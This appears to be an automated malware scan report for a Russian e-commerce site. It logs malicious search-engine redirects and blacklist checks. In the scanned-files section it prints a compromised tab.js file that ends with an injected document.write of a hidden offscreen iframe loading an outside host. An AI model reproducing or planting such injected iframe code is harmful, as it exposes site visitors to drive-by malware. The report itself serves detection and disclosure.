Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://argo-ural.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: argo-ural.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Tue, 16 Sep 2014 17:48:33 GMT Pragma: no-cache Location: http://web-redirect.ru/?web Server: Jino.ru/mod_pizza Content-Type: text/html; charset=utf-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: _cutt_caches_images=1410889713; expires=Wed, 17-Sep-2014 17:48:33 GMT; path=/ Set-Cookie: PHPSESSID=2b27f4cdb14cdf325def7fc87f363823; path=/ Set-Cookie: language=ru; expires=Thu, 16-Oct-2014 17:48:33 GMT; path=/; domain=argo-ural.ru Set-Cookie: currency=RUB; expires=Thu, 16-Oct-2014 17:48:33 GMT; path=/; domain=argo-ural.ru | malicious |
URL: http://web-redirect.ru/?web (imitation of visitor from search engine) GET /?web HTTP/1.1 Host: web-redirect.ru Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Found Cache-Control: max-age=0 Connection: close Date: Tue, 16 Sep 2014 17:48:33 GMT Pragma: no-cache Location: http://rosmetsar.ru/components/com_weblinks/2/separator.php Server: nginx/1.0.15 Content-Length: 0 Content-Type: text/html; charset=utf-8 Expires: Thu, 21 Jul 1977 07:30:00 GMT Last-Modified: Tue, 16 Sep 2014 17:48:33 GMT X-Powered-By: PHP/5.3.3 | suspicious |
Scanned pages/files
Request | Server response | Status |
http://argo-ural.ru/ | 200 OK Content-Length: 41285 Content-Type: text/html | clean |
http://argo-ural.ru/catalog/view/javascript/jquery/jquery-1.3.2.min.js | 200 OK Content-Length: 57422 Content-Type: application/javascript | clean |
http://argo-ural.ru/catalog/view/javascript/jquery/thickbox/thickbox-compressed.js | 200 OK Content-Length: 5710 Content-Type: application/javascript | clean |
http://argo-ural.ru/catalog/view/javascript/jquery/tab.js | 200 OK Content-Length: 713 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
$.tabs = function(selector, start) { $(selector).each(function(i, element) { $($(element).attr('tab')).css('display', 'none'); $(element).click(function() { $(selector).each(function(i, element) { $(element).removeClass('selected'); $($(element).attr('tab')).css('display', 'none'); }); $(this).addClass('selected'); $($(this).attr('tab')).css('display', 'block'); }); }); if (!start) { start = $(selector + ':first').attr('tab'); } $(selector + '[tab=\'' + start + '\']').trigger('click'); };;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://biigoo.qhigh.com/036f32a8.0WhHi8TzVrtztN?default" height="110" width="110"></iframe>');
Antivirus reports:
http://argo-ural.ru/catalog/view/javascript/jquery/jquery.cycle.all.min.js | 200 OK Content-Length: 31200 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
(function($){var ver="2.88";if($.support==undefined){$.support={opacity:!($.browser.msie)};}function debug(s){if($.fn.cycle.debug){log(s);}}function log(){if(window.console&&window.console.log){window.console.log("[cycle] "+Array.prototype.join.call(arguments," "));}}$.fn.cycle=function(options,arg2){var o={s:this.selector,c:this.context};if(this.length===0&&options!="stop"){if(!$.isReady&&o.s){log("DOM not ready, queuing slideshow");$(function(){$(o.s,o.c).cycle(options,
Antivirus reports:
http://argo-ural.ru/index.php?route=common/home | 200 OK Content-Length: 41285 Content-Type: text/html | clean |
http://argo-ural.ru/index.php?route=common/catalog/view/javascript/jquery/jquery-1.3.2.min.js | 404 Not Found Content-Length: 18296 Content-Type: text/html | clean |
http://argo-ural.ru/index.php?route=common/catalog/view/javascript/jquery/catalog/view/javascript/jquery/jquery-1.3.2.min.js | 404 Not Found Content-Length: 18358 Content-Type: text/html | clean |
http://argo-ural.ru/index.php?route=common/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/jquery-1.3.2.min.js | 404 Not Found Content-Length: 18420 Content-Type: text/html | clean |
http://argo-ural.ru/index.php?route=common/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/jquery-1.3.2.min.js | 404 Not Found Content-Length: 18482 Content-Type: text/html | clean |
http://argo-ural.ru/index.php?route=common/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/jquery-1.3.2.min.js | 404 Not Found Content-Length: 18544 Content-Type: text/html | clean |
http://argo-ural.ru/index.php?route=common/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/jquery-1.3.2.min.js | 404 Not Found Content-Length: 18606 Content-Type: text/html | clean |
http://argo-ural.ru/index.php?route=common/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/jquery-1.3.2.min.js | 404 Not Found Content-Length: 18668 Content-Type: text/html | clean |
http://argo-ural.ru/index.php?route=common/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/jquery-1.3.2.min.js | 404 Not Found Content-Length: 18730 Content-Type: text/html | clean |
http://argo-ural.ru/index.php?route=common/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/jquery-1.3.2.min.js | 404 Not Found Content-Length: 18792 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=argo-ural.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://argo-ural.ru/
Result: argo-ural.ru is not infected or malware details are not published yet.